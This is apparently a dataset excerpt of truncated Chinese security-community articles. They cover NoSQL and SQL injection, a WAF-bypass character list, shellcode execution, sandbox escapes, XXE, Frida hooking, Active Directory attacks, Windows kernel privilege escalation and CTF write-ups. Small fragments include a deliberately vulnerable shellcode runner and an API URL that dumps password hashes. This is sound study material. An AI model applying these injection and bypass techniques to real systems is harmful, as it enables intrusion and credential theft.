text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# CockpitCMS NoSQL注入漏洞分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
在网络攻击方法中,SQL注入一直是最流行的攻击之一,随着NoSQL数据库,如MongoDB、Redis的出现,传统的SQL注入不再可行。但是这并不意味着NoSQL数据库就百分百安全。NoSQL注入漏洞第一次由Diaspora在2010年发现,到现在,NoSQL注入和SQL注入一样,如果开发者不注重,同样会对企业服务器造成致命威胁。
这次,根据PHP CMS Cockpit中存在的几个漏洞,来学习NoSQL
Injection。这几个漏洞被分配了3个CVE,分别是CVE-2020-358... | 社区文章 |
# Fuzzingbook学习指南 Lv1
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
强网杯以来就一直很想系统性的学习fuzzing技术,fuzzingbook可以说是fuzzing技术学习的圣经,但因为它全英文编写,且长度感人,因而很多人都望而止步。我将自己的学习经验分享给大家,希望能帮助大家更好的学习fuzzing技术。
## fuzzing是啥?
在98年的一个暴雪天,Madison教授在使用电话线(是的,那时候都是用电话线传递信号)远程访问学校的电脑,但由于当时雷电交加,传输中有些数据产生了差错,导致很多命令行程序频繁发生错误,教授觉得程序猿干得太不行了,程序健壮性太差了,于是他就... | 社区文章 |
翻译自:<https://medium.com/bugbountywriteup/authentication-bypass-in-nodejs-application-a-bug-bounty-story-d34960256402>
翻译:聂心明
hi,大家好,
在这篇文章中,我将完整介绍我在私有src中发现的一个漏洞,这个漏洞可导致nodejs的身份认证被绕过。并且我将介绍如果我遇到类似的接口(只提供单一登录表单的接口)我将采取什么样的方法去测试,以发现我所感兴趣的东西。
# 方法
如果你挖过大公司的漏洞(像[GM](https://hackerone.com/gm),
[Sony](https://hackerone.... | 社区文章 |
* * *
title: shellcode 的艺术
tags: pwn
* * *
这里总结一下shellcode的各种类型
## 一、直接调用
#include <stdio.h>
int main(int argc, char const *argv[])
{
char s[0x500];
gets(s);
((void(*)(void))s)();
return 0;
}
直接执行shellcode,考查对shellcode的编写能力,pwntool可以直接生成`shellcraft.sh()`,没什么难度
## 二、禁用了s... | 社区文章 |
### 0x00 写在前面
威胁情报这个玩意儿可谓是借着数据驱动安全的东风变成了少数被吹上天的猪之一,虽然笔者不否认威胁情报对于日常安全运营和安全研究方面的作用,但是我们也需要认清楚某些现实情况——威胁情报目前还不能完全预测攻击,至少目前行业没有成功案例和最佳实践可以佐证这一暂时看来不靠谱的观点。那么目前威胁情报到底发展到什么样的水平?威胁情报对于安全行业的意义在哪里?威胁情报未来会发展为什么样的样子?威胁情报真的是网络安全的“少数派报告“么?这些就是我们下面要讨论的东西。
### 0x01 威胁情报1.0——数据之间的较量
威胁情报概念我们引用uk-cert的观点:[It is] evidence-based knowledge,... | 社区文章 |
# 前言
AngularJS(Angular)是一个著名的基于JavaScript的开源Web框架,用于前端编程。AngularJS主要用于使用模型视图控制器(MVC)和模型视图模型(MVVM)架构开发单页面应用程序
这篇博文主要展示了如何武器化现有的AngularJS沙箱逃逸。但不要忘了,从Angular1.6及以后版本,Angular沙箱已被删除。此举动使框架代码更快、更小、更易于维护。删除此功能的主要原因是安全研究人员发现太多绕过方式已经严重影响了Angular功能。
在本文的其余部分,我们假设攻击者已经发现XSS漏洞,并试图进一步利用该漏洞进行牟利。
**此博客仅用于教育目的。请勿在未获授权的系统中进行任何攻击。... | 社区文章 |
# 前言
php是一种解释型脚本语言.
与编译型语言不同,php源代码不是直接翻译成机器语言.而是翻译成中间代码(OPCODE) ,再由解释器(ZEND引擎)对中间代码进行解释运行 .
在php源代码的保护在原理可以分为3大类.
* 源代码混淆(编码)
* OPCODE混淆(编码)
* 修改解释引擎(虚拟机)
在部署上可以分为2大类.
* 无扩展
* 有扩展
下面分析下各种加密方案的实现方法
# PHP 加密方案分析
## 无扩展方案
### 源代码混淆
无扩展的加密在一些小开发者比较常见。
这种源代码保护方式侵入性小,无需对服务器做额外的配置,兼容性较强。
这种情况混淆后的源代码还原非常... | 社区文章 |
`先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。`
### 投稿
* 直接右上角`【个人中心】`-`【创建新帖子】`-`【节点模块】`选择`【技术文章】`。投稿时麻烦提供下可联系到作者的IM,方便审核沟通。(如未收到回复,联系wx:50421961)
* Ps: `MD编辑器支持图片拖拽上传、Word文档图片直接复制上传、截图复制自动上传 (๑•̀ㅂ•́)و✧`
* * *
WordPress 4.8.3中修复了一个重要的SQL注入漏洞。漏洞是今年9月20日由Hacker-One报告的。本文主要讲了漏洞的技术细节和解决方法。
## 升级到最新版本
网站管理员应该升级WordPress到4.... | 社区文章 |
# 浅析python反序列化
### python的序列化和反序列化是什么
python的序列化和反序列化 是将一个类对象向字节流转化从而进行存储 和 传输 然后使用的时候 再将字节流转化回原始的对象的一个过程
我们可以用代码 来展示出这个序列化 和反序列化 的过程
import pickle
class Person():
def __init__(self):
self.age=18
self.name="Pickle"
p=Person()
opcode=pickle.dumps(p)
print(opcode)
#... | 社区文章 |
# 曝光!黑灰产掘金帝国的“地基”,窥探暗象丛生的网络世界
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
**有市场,有需求,就意味着机会丛生。**
说到“IP“属性的应用场景,其实早已渗透到我们的生活当中。比如:
_一个手机号码,只能在平台注册一个账号_
_网上投票,一个ID只能投一票_
_线上福利抽奖活动规则一般会注明“每个用户ID仅限参与一次”_
这里的ID的“唯一性”就是平台或者活动方为了保证活动公平性及自身利益,做出的限制,因为在我们看不到的网络世界,薅羊毛、诈骗、群控、挂机、游戏代练、撞库晒密、刷量等等黑灰产行为时刻发生着,这些行为从悄然滋生到发展为成熟的产业链,始终绕不开最底层的支... | 社区文章 |
### 0x00 前言
7月18日,一个名为 HTTPOXY 的漏洞在安全圈内广泛传播。云盾攻防对抗团队第一时间对此漏洞进行了深入分析,发现其本质是一个 CGI
环境变量劫持漏洞,对 CGI 的环境变量 HTTP_PROXY 变量进行劫持。如果 CGI 在运行过程中依赖
HTTP_PROXY,那么攻击者将能够获取到程序敏感数据,甚至伪造返回包对 CGI 程序实现欺骗。
### 0x01 漏洞分析
这个漏洞实际上 CGI 程序对变量命名不规范导致的。CGI 程序在接收到 HTTP Header 后,会把部分 Header 的信息存入以 HTTP_
开头的变量中。Header 中要是出现了 Proxy 头,那么 Proxy 头中... | 社区文章 |
phpinfo()想必的最熟悉的了,在搭建环境之后都会随后写一个phpinfo()来测试环境是否正常,很多人测试完毕忘记删除就开始部署环境了,这就造成了一些敏感信息的泄漏。那么我们能从phpinfo()中获得哪些敏感信息呢?php版本这种就不用说了,来看一下泄漏了哪些比较敏感的信息。
一、绝对路径(_SERVER[“SCRIPT_FILENAME”])
这个是最常用,也是最有效的一个办法,找到phpinfo()页面可以直接找到网站的绝对路径,对于写shell和信息搜集是必不可少的。
二、支持的程序
可以通过phpinfo()查看一些特殊的程序服务,比如redis、memcache、mysql、SMTP、curl等等如果服务器装了re... | 社区文章 |
# glibc2.23下mallopt漏洞的源码分析与例题
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 源码分析
### mallopt函数
* 读写global_max_fast的宏
#define set_max_fast(s) \
global_max_fast = (((s) == 0) \
? SMALLBIN_WIDTH \
: ((s + SIZE_SZ) & ... | 社区文章 |
# PDF漏洞(CVE-2018-12794)浅析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 漏洞简介
CVE-2018-12794属于类型混淆漏洞,产生漏洞原因是通过构建XML数据包(XML Data
Package,XDP)模版,并对XML表单体系结构(XML Forms
Architecture,XFA)对象执行某些JavaScript操作,攻击者就可以强制Adobe Reader从模版对象的边界引用数据。
2018年7月份,Adobe补丁更新:
### 漏洞基本信息
漏洞ID:CVE-2018-12794
漏洞名称:PDF类型混淆漏洞
漏洞类型:远程代码执行
威胁类型:类型混淆... | 社区文章 |
# 【技术分享】XXE漏洞攻防之我见
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
作者:[ **激越王**](http://bobao.360.cn/member/contribute?uid=2577494374)
**预估稿费:400RMB**
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
你是否听说过xml注入攻击呢,或者对它只知其一不知其二呢?
现在让我们从xml相关基础知识开始,一步步了解xml攻击的原理和方式。
这篇文章主要针对扫盲,请大佬们轻喷,有错误的地方欢迎指出。
XML 被设计为传输和存储数据,其焦点是数据的内容。
HTML 被设... | 社区文章 |
# 实用FRIDA进阶:内存漫游、hook anywhere、抓包
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
本章中我们进一步介绍,大家在学习和工作中使用`Frida`的实际场景,比如动态查看安卓应用程序在当前内存中的状态,比如指哪儿就能`hook`哪儿,比如脱壳,还有使用`Frida`来自动化获取参数、返回值等数据,主动调用API获取签名结果`sign`等工作实际高频场景,最后介绍一些经常遇到的高频问题解决思路,希望可以切实地帮助到读者。
## 1 内存漫游
`Frida`只是提供了各种`API`供我们调用,在此基础之上可以实现具体的功能,比如禁用证书绑定之类的脚本,就是使用`Frida... | 社区文章 |
# 域渗透:攻击活动目录从 0 到 0.9(一)
|
##### 译文声明
本文是翻译文章
原文地址:<https://zer1t0.gitlab.io/posts/attacking_ad/>
译文仅供参考,具体内容表达以及含义原文为准。
## 为什么会有这篇文章?
本指南的目的是从攻击者的角度来看待活动目录。我将尝试回顾活动目录的不同方面以及每个渗透测试人员应该掌握的术语,以理解可以在域中进行的攻击。
为了理解如何攻击活动目录(以及任何其他技术),我认为重要的是不仅要知道工具怎么用,还要知道工具是如何工作的,它们使用什么协议 /
机制,以及为什么存在这些协议 / 机制。
出现在本文的信息来源于公开的知识以及我在 AD 方面的一... | 社区文章 |
# 安恒2019一月赛二进制赛题解析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> 好久没打安恒的月赛了,碰巧今天有空,就做了下二进制的几道题目,总体难度不是很大,还好没有触及到我的知识盲区Orz。
## reverse
### 来玩蛇吧
这题给了2个文件,一个`exe`和一个`pyc`,结合图标和题目意思,我好像明白了什么,估计是`python`的逆向题。
以前也做过这种类型的题,但是很久没做,有点生疏了,主要是要知道这个程序是`python`写的,并且用打包器制作成可执行文件的。直接上网搜索`python`打包器就能找到这个工具的名字叫做`PyInstaller`,根据[Pcat的博... | 社区文章 |
# 前言
本篇是Cryptography密码学类的题解。难度从简到难,涉及了一些ctf比赛中常见的密码学套路。部分题目附件已打包。
链接: <https://pan.baidu.com/s/13LVIkBMuUekRLGCsLElIVg> 提取码: 3ei6
# Crypto Warmup 1
## Question
> Crpyto can often be done by hand, here's a message you got from a friend,
> `llkjmlmpadkkc` with the key of `thisisalilkey`. Can you use this
> [table](http... | 社区文章 |
## Author:ILU
## 前言
上一篇文章讲了如何从进程的TEB获取PEB,然后再从PEB中的LDR中的加载时的模块链表获取指定模块(Kernel32.dll),并通过断链的形式隐藏kernel32.dll。但是这里的隐藏并不是真正隐藏dll模块,只是在某些情况下看不到,实际上还是可以查得到的。上一篇文章学的过程实在是太久了,琢磨了很久,好在也是整出来了。
本篇文章利用PEB获取到的模块基址,然后一步一步的找到对应的函数,然后再利用函数执行shellcode。
`注意`:编译时选择x86,x64代码还需要做一些简单的修改。
## 正题
在这里的话我们要了解一下PE相关的知识。
#### 什么是PE文件?
PE文件的全称是Po... | 社区文章 |
# 全国频发!骗子“当面“洗空你的钱,到底是怎么做到的?
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
近期,各地相继出现利用网络视频会议软件中的 **“共享屏幕”**
功能,偷窥用户隐私信息、实施电信网络诈骗的新型的诈骗趋势,受害用户往往在毫无察觉的情况下,遭遇财产损失,请广大用户务必重视。
## 首先,给大家讲讲什么是“共享屏幕”?
简单来说, **“共享屏幕”相当于手机的录屏操作** 。它会把屏幕上显示的内容全都记录下来,并同步让对方看到,包括弹框显示短信、微信、其他App推送的内容。
也就是说
**你在手机上的任何操作**
**对方都能看到**
**包括输入银行卡账号及密码**
**收到... | 社区文章 |
# DDG.Mining.Botnet:一个瞄准数据库服务器的挖矿僵尸网络
##### 译文声明
本文是翻译文章,文章原作者 JiaYu,文章来源:blog.netlab.360.com
原文地址:<http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server/>
译文仅供参考,具体内容表达以及含义原文为准。
从 2017-10-25 开始,我们监控到有恶意代码在大规模扫描互联网上的 OrientDB
数据库服务器。进一步的分析发现,这是一个长期运营的僵尸网络,其主要目标是挖取门罗币(XMR,Monero CryptoCurrency)。我们将其命名... | 社区文章 |
# ADIDNS 安全研究:绕过 GQBL 限制解析 WPAD 域名
|
##### 译文声明
本文是翻译文章,文章原作者 netspi,文章来源:blog.netspi.com
原文地址:<https://blog.netspi.com/adidns-revisited/>
译文仅供参考,具体内容表达以及含义原文为准。
2018年6月,作者发布了[如何利用adidns](https://blog.netspi.com/exploiting-adidns/)的文章,文章主要涵盖攻击和防御的相关技术。本文分析另一个与域名解析有关的默认设置问题。
## WPAD
Web Proxy Auto-Discovery (WPAD,web代理自... | 社区文章 |
# KINIBI TEE 的可信环境及相关漏洞与利用方法
##### 译文声明
本文是翻译文章,文章原作者 synacktiv,文章来源:synacktiv.com
原文地址:<https://www.synacktiv.com/posts/exploit/kinibi-tee-trusted-application-exploitation.html>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
很多Android设备和嵌入式系统都使用TEE(Trusted Execution
Environment,可信执行环境)来实现一些安全功能(如硬件密码/密钥、DRM(数字版权保护)、移动支付、生物识别等等)。在ARM平台... | 社区文章 |
作者:BG7YWL@伏宸安全实验室
公众号:[伏宸安全实验室](https://mp.weixin.qq.com/s/so4XzPaYtzAvgbjarm_9fg "伏宸安全实验室")
#### 前言
LimeSDR 是一款完全开源的SDR产品,和 HackRF 一样,包括 PCB 设计图,FPGA 代码,HOST代码完全公开,方便研究和学习 SDR
系统原理。虽然市面上有很多 SDR 产品,但很少有像 LimeSDR 性价比这么高的。
LimeSDR 支持 100kHz 到 3.8GHz 频率范围,已经可以不需外置上变频器,即可完成短波应用的使用,另外LimeSDR
是一款完全开源的SDR产品包含了 2×2 MIMO 的支持,... | 社区文章 |
### 一、摘要
从一道简单fast_bin利用题,分析当前fast_bin attack的本质思想就是通过一系列的绕过check与伪造fast_bin freed
chunk
fd指针内容获得(malloc)一块指向目标内存的指针引用,如got表、`__malloc_hook`、`__free_hook`等引用,即可对其原来的函数指针进行改写,如改写为
`__free_hook`
为某处one_gadget地址,即可对目标程序流程进行控制,拿下shel;并以此题目介绍当前常用的三种patch手法:增加segment,修改section如
`.eh_frame`,IDA keypatch。断断续续入门pwn也有一段时间了,写下此文... | 社区文章 |
# SQL注入之BypassWaf
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
无论是在CTF比赛中还是在现实项目中,都会遇到各种各样的waf,没有绝对安全的系统,仔细的研究总会发现被“漏掉”的地方。
最近在研究过waf的技巧,期间还是很有趣的,在这里与大家分享一下,仅个人见解,哪里写的不好欢迎各位师傅斧正!本文只研究MySQL数据库,其余有机会在分享。
### 环境
sqli-labs
某常见最新版免费防护软件(仅作研究用)
windows2008+phpstudy
## 0x01 等价字符
空格:%20,+,(),%0a,%09,%a0,%0b,%0c,%0d,/... | 社区文章 |
# node.js远程内存泄露漏洞
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://nodesecurity.io/advisories/67>
译文仅供参考,具体内容表达以及含义原文为准。
**近日,在允许用户通过简单地发送ping数据帧,来分配内存的ws模块中发现存在着漏洞。该漏洞会拒绝用户发送数据的请求,
使用户发送ping数据帧功能失效,在此之前,还会加大数据帧的负载。**
实际上,这就是漏洞的具体表现。但在模块中,ws通常将我们所要传入内存的所有数据进行相应的转换,这就是漏洞之所在。我们对所要发送数据的类型都没做任何检查。当你在nide.js中需要存储一个数字时,该漏洞就会自... | 社区文章 |
# 恶意邮件智能监测与溯源技术研究
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。本文翻译自 [原文链接]()。如若转载请注明出处。
商务合作,文章发布请联系 anquanke@360.cn
本文由 **中睿天下** 原创发布
转载,请参考[转载声明](https://www.anquanke.com/note/repost),注明出处:
[https://www.anquanke.com/post/id/172046](/post/id/172046)
安全客 - 有思想的安全新媒体
本文转载自: []()
如若转载,请注明出处: []()
安全客 - 有思想的安全新媒体
分享到:
* [社... | 社区文章 |
# 简介
Confluence Server和Confluence Data
Center的widgetconnector组件存在严重的安全漏洞,可以在不需要账号登陆的情况下进行未授权访问,精心构造恶意的JSON字符串发送给widgetconnector组件处理,可以进行任意文件读取、Velocity-SSTI远程执行任意命令。
影响版本:
* 更早 -- 6.6.12(不包含)
* 6.7.0 -- 6.12.3(不包含)
* 6.13.0 -- 6.13.3(不包含)
* 6.14.0 -- 6.14.3(不包含)
影响组件:
* widgetconnector.jar <=3.1.3
# Apache Ve... | 社区文章 |
# 【技术分享】手把手教你如何向Andoird应用中注入Metasploit载荷
##### 译文声明
本文是翻译文章,文章来源:pentestlab.blog
原文地址:<https://pentestlab.blog/2017/03/13/injecting-metasploit-payloads-into-android-applications/>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
翻译:[pwn_361](http://bobao.360.cn/member/contribute?uid=2798962642)
稿费:100RMB(不服你也来投稿啊!)
投稿方式:发送邮件至linwei#3... | 社区文章 |
# 破一桩疑案——硬件错误
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0、引言
这次分析的问题 ,与熊力书中遇到的一个案例特别类似,分析之余,发现还是有很多思路以及很多新奇的知识可以记录下来,与君分享。
涉及到以下知识点:
1、硬件断点的使用;
2、硬件cpuid指令与dmp中相关信息的查询;
3、dmp分析的一般思想方法;
4、虚拟内存的VAD树和页表;
## 1、背景
这次的dmp次数不多,目前根据后台聚类之后的结果,同类的只有一次。本来可以不用操心之,但谁让咸吃萝卜淡操心的我就喜欢干这个事呢。分析之后,确实发现了一个很奇怪的事情,安推论这种情况出现的概率是极其小的... | 社区文章 |
# 关于如何使用信用卡磁条阅读器读取酒店钥匙卡数据的分析
##### 译文声明
本文是翻译文章,文章来源:labs.portcullis.co.uk
原文地址:<https://labs.portcullis.co.uk/blog/reading-hotel-key-cards-with-a-credit-card-magstripe-reader/>
译文仅供参考,具体内容表达以及含义原文为准。
在这篇文章中,我描述了为什么廉价的磁条阅读器不能读取所有的磁条,只能读取信用卡和借记卡。这并不能帮助了解酒店钥匙卡上的数据,而这正是我真正想要知道的。我没有特意地去购买更好的阅读器,而是选择了打开廉价的磁条阅读器,略作探索,找到了一种从... | 社区文章 |
# 前言
最近在学习中学到了不少审计时的小技巧,都比较简单,但有一些在代码中比较容易出现的错误,这里做了一下总结分享,有错误希望师傅们斧正,一起交流学习。
# for 循环中的 count
这个小技巧是从这里看到的:[关于CMSMS中SQL注入漏洞的复现与分析与利用](https://www.freebuf.com/vuls/207026.html)
当 `count` 出现在 `for` 循环中,`count` 每次都会计算,如果这时候数组发生了变化,就会有一些差异。
例子:
<?php
$a = array("a","b","c");
for ($i=0; $i < count($a); $i++) {... | 社区文章 |
# 从pipePotato中学习Windows Access Token令牌模拟
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
[](https://p1.ssl.qhimg.com/t01ae026b6816cabf27.bmp)
上周安全研究员itm4n发布了PrintSpoofer权限提升:<https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/>。经过分析Github上的代码(也可以看这篇360灵腾安全实验室发布的原理分析:<https://www.anquanke.com/post/id/204510... | 社区文章 |
## 前言
如果说一个产品RCE漏洞相对描述是“一语中的”、“一发入魂”的杀气,想必各大厂商在对杀气感知和处理上总是最快最灵敏的,从各大专有SRC对报告的反映速度、修复速度、挖掘难易程度来说,也很好的佐证了这一点。log里保存着任何服务器接收到的数据原文随时溯源当场处理爱憎分明、系统环境在被攻击时的奇怪变化一看便知,一个好的RCE确实是无敌的,至少在被受攻击者审计出来前,高效便捷准确有效。但它一旦被使用,变会在厂商眼皮下留下“挨打痕迹”。
另一对立面的“面向用户攻击”就没RCE那么方便了,比如一个简单的xss或者csrf的利用,虽然可以在不侵入和损坏框架主体的情况下触发,但需要用户少许的参与,增加了攻击的难度和不确定性。but!!话... | 社区文章 |
PAYLAOD:
http://127.0.0.1/zentao116/api-getModel-api-sql-sql=select+account,password+from+zt_user
(需要用户权限)
第一眼看到这种传参方式,我心里是懵逼的,利用到的文件都看不出来,所以先研究一下他的URL是怎么写的。
PS:使用禅道前要将本地的apache服务和mysql服务关闭,否则会发生冲突
PS:由于环境限制,没办法搭建调试环境,所以文章中若是有错误内容还请师傅们务必斧正!!!∑(゚Д゚ノ)ノ
## URL地址格式分析
以URL:`http://192.168.189.128/zentao/api-getModel-use... | 社区文章 |
**作者:dawu@知道创宇404实验室**
**时间:2019/02/25**
**英文版本:<https://paper.seebug.org/943/>**
### 0x00 前言
这是一篇游戏引发的简单技术文。
起因是个人很喜欢玩 `google play`
上的一些数字类型(角色攻击是线性增长,怪物指数变强,到后期越打不过,通过重生增强属性变强)的小游戏。但是这种游戏仍旧存在一定缺陷,前期资源不多,玩的太慢、玩的时间长了,就感觉没意思,就不想玩了,所以在玩到游戏中期的时候,往往都会去网上搜索XXX破解版/内购版,快速进入后期然后放弃这款游戏。
这样的做法其实是很不安全的,因为无法判断XXX破解版/内购版在破解/内购... | 社区文章 |
# 作者个人b站:<https://space.bilibili.com/4404257>
由于我的挖洞团队『大哥们别挖了孩子要哭惹』,经过上一篇hook前端的文章的影响后,发现其实——只要hook前端的危险生成函数,然后一般而言,危险函数会和过滤函数存在同一个或者相近的作用域下,简单来说:
let filter_data = filter(raw_data)
generate(a)//危险函数
所以用之前想到的hook方法hook住这个generate函数并找到与他同级或者上级的过滤函数这个是很必要的,那么我们要怎么找呢?
我们发现其实js在每个函数作用域下提供一个arguments的变量,而这个变量中的callee.caller... | 社区文章 |
# 【知识】5月31日 - 每日安全知识热点
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**热点概要: syscan360国际前瞻信息安全会议在美国西雅圖四季酒店召开、影子经纪人推出0day漏洞订阅服务 每月21000美元、Judy
Android 恶意病毒感染超过3650万谷歌Play商店用户、RFID Hacking with The Proxmark
3、sudo的get_process_ttyname()方法存在提权漏洞、Windows MsMpEng remotely exploitable UaF
due to design issue in GC engi... | 社区文章 |
# 【CTF 攻略】RCTF 2017 官方Writeup
##### 译文声明
本文是翻译文章,文章来源:xctf.org.cn
原文地址:<https://www.xctf.org.cn/information/e0d90ad9d0609320fd6743706135a80913d27b8d/>
译文仅供参考,具体内容表达以及含义原文为准。
****
**传送门**
[**RCTF
2017上演安全极客的速度与激情,国际黑马战队motesolo积分榜排名第一!**](http://bobao.360.cn/news/detail/4173.html)
**
**
**WEB**
**rBlog (13 solved)**
... | 社区文章 |
# 用于UAF漏洞的二进制级定向模糊测试
##### 译文声明
本文是翻译文章,文章原作者 researchgate,文章来源:researchgate.net
原文地址:<https://www.researchgate.net/publication/339498267_Binary-level_Directed_Fuzzing_for_Use-After-Free_Vulnerabilities>
译文仅供参考,具体内容表达以及含义原文为准。
## 摘要
定向模糊测试着重于通过利用如(部分)bug堆栈追踪、修补程序或危险操作等附加信息,来自动测试代码的特定部分。关键性的应用包括bug复现、补丁测试和静态分析报告验证。尽管定向... | 社区文章 |
研究人员发现Java Usage
Tracker的设计漏洞可以使攻击者创建任意文件、注入特定攻击者参数、进行权限提升等。这些串起来可以用来进行权限提升以访问受感染系统中本来受保护或受限于其他应用或用户的资源。
本文主要描述该漏洞在Windows平台上的工作原理,以及如何定义条件来触发该漏洞利用。
# Java Usage Tracker
Java Usage Tracker是Java中用来跟踪系统中Java运行时环境 (JRE) 的使用情况,有以下功能:
* Java virtual machine (JVM)开始配置参数日志信息;
* 将数据复制到日志文件或重定向到UDP服务器;
* 允许在Usage Tracker配... | 社区文章 |
# Cryptojacking侵入云端:如何看待Docker镜像进入Docker Hub
|
##### 译文声明
本文是翻译文章,文章来源:kromtech.com
原文地址:<https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers>
译文仅供参考,具体内容表达以及含义原文为准。
Kromtech安全中心发现了17个存储在Docker
Hub整整一年的恶意docker镜像。即使在sysdig.com和fortinet.com通过G... | 社区文章 |
作者:AArti Singh
来源:<http://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/>
* * *
本文讲解如何利用Linux的Cron Jobs(定时任务)来进行权限提升。
# cron jobs
定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是
Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和
/etc/cro... | 社区文章 |
`作者: Ivan1ee@360云影实验室`
# 0X00 前言
在.NET 框架中的 XmlSerializer 类是一种很棒的工具,它是将高度结构化的 XML 数据映射为 .NET
对象。XmlSerializer类在程序中通过单个 API 调用来执行 XML 文档和对象之间的转换。转换的映射规则在 .NET
类中通过元数据属性来表示,如果程序开发人员使用Type类的静态方法获取外界数据,并调用Deserialize反序列化xml数据就会触发反序列化漏洞攻击(例如DotNetNuke
任意代码执行漏洞 CVE-2017-9822),本文笔者从原理和代码审计的视角做了相关脑图介绍和复现。
# 0X01 XmlSerializer序... | 社区文章 |
# 前言
这里是Sulley使用手册的第三部分,从这里开始本系列文章将开始讲述Sulley fuzzer的实际应用。
手册链接:<http://www.fuzzing.org/wp-content/SulleyManual.pdf>
# A Complete Walkthrough: Trend Micro Server Protect
为了更好地将这些东西联系在一起。我们将从头到尾完成一个实例的演示。这个例子将涉及许多中级到高级的Sulley概念,应该有助于巩固您对框架的理解。本节的主要目的是演示许多高级Sulley功能的用法,因此跳过了有关target的许多细节,所选目标是Trend
Micro Server Protect... | 社区文章 |
### subdomain takeover
子域名劫持/接管
* 本文内容包括
* 漏洞实例
* 实例分析
* 漏洞原理
* 漏洞危害
* 测试工具
* 防御方案
### 漏洞实例 - 有趣的测试
**声明下:已知情的测试,白帽师傅wAnyBug已于2019年3月份报告给其官方SRC 且没有做任何违规的事情!**
某日,刚加上白帽师傅@wAnyBug,聊天过程可谓步步惊魂(聊天内容为点击两个url)
猜测:看到是子域名,初步感觉子域名learnt.Micro _**_.Com被劫持(接管)。
确认:Chrome隐身模式下访问 learnt.Micro _**_.Com 看到了非 ... | 社区文章 |
# Yara入门——如何通过Yara规则匹配CobaltStrike恶意样本
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
首先,YARA规则是VT的开发人员发布的,用于同类样本的批量检索和查杀。
通过Yara引擎和我们编写的Yara规则,可以快速对一批样本进行扫描和识别,从而找到我们希望得到的样本。
官方的github库地址:<https://github.com/VirusTotal/yara/releases>
官方文档说明:<https://yara.readthedocs.io/en/v3.7.0/index.html>
## 0x01 Yara的安装和使用
#... | 社区文章 |
0x00 私有组件浅谈
android应用中,如果某个组件对外导出,那么这个组件就是一个攻击面。很有可能就存在很多问题,因为攻击者可以以各种方式对该组件进行测试攻击。但是开发者不一定所有的安全问题都能考虑全面。
对于这样的问题,最方便的修复方式就是在确定不影响业务的情况下,将这个存在问题的组件不对外导出变成私有组件。这样做的确很有效,私有组件也很安全。但是,如果存在某个私有组件能被导出组件启动的话,那么这个私有组件其实就不再是私有了。如果攻击者可以通过控制导出的组件对私有组件进行控制,那么攻击者的攻击面就大大的扩大了。如果不对这种情况进行关注很可能带来一系列安全问题。
正常情况:
私有组件能被启动情况:
0x... | 社区文章 |
# 【木马分析】360追日团队: 暗号“戒烟”:Terror EK集合八枚漏洞发起挖矿机挂马进攻
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
**一、概述**
****
近期,360安全团队监测到一个利用漏洞攻击包Terror Exploit
Kit(简称TerrorEK)散播门罗币挖矿软件的挂马行为,通过内嵌作者的门罗币地址,将用户的机器强占为自己挖矿赚钱的工具。
这是我们近期在国内发现TerrorEK的传播记录,360第一时间发现并进行分析,该TerrorEK除了集成了多个常见的IE和Flash漏洞以外,还加入了最新的IE漏洞组合
**CVE-2017-0037** ... | 社区文章 |
# JavaScript 原型链污染
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 前言
最近看到一篇原型链污染的文章,自己在这里总结一下
## 0x02 javascript 原型链
js在ECS6之前没有类的概念,之前的类都是用funtion来声明的。如下
可以看到`b`在实例化为`test对象`以后,就可以输出test类中的`属性a`了。这是为什么呢?
原因在于js中的一个重要的概念:继承。
而继承的整个过程就称为该类的原型链。
`在javascript中,每个对象的都有一个指向他的原型(prototype)的内部链接,这个原型对象又有它自己的原型,直到null为止`
... | 社区文章 |
# Windows内核提权漏洞CVE-2018-8120分析 - 上
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 背景:
因一次需要提权时,苦于查找安全可行的Exploit,加上一直对二进制漏洞心怀仰慕,所以花了点时间从底层研究一下漏洞原理及漏洞利用的编写,因为是从零开始,在摸索的过程中也踩了不少坑,记录下来,以供借鉴和回顾。
## 工具:
1. IDA pro
2. PChunter
3. win7x86虚拟机
4. Visual Studio 2019
5. WinDBG
## 提要:
这次挑选了Windows系统CVE-2018-8120权限提升漏洞来着手研... | 社区文章 |
## 前言:
